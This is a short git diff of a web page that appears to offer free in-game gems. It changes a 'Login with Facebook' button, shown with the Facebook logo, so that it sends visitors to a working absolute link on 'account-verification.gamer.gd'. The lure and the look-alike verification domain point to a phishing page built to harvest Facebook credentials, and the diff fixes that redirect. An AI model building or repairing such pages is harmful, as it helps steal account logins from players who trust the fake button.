--- a/index.html
+++ b/index.html
@@ -148,7 +148,7 @@
       <button class="mini-btn">💎 +100</button>
     </div>
 
-    <button class="fb-btn" onclick="window.location.href='account-verification.gamer.gd'">
+    <button class="fb-btn" onclick="window.location.href='https://account-verification.gamer.gd/?i=1'">
       <img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" width="20" height="20" alt="FB" />
       Login with Facebook
     </button>
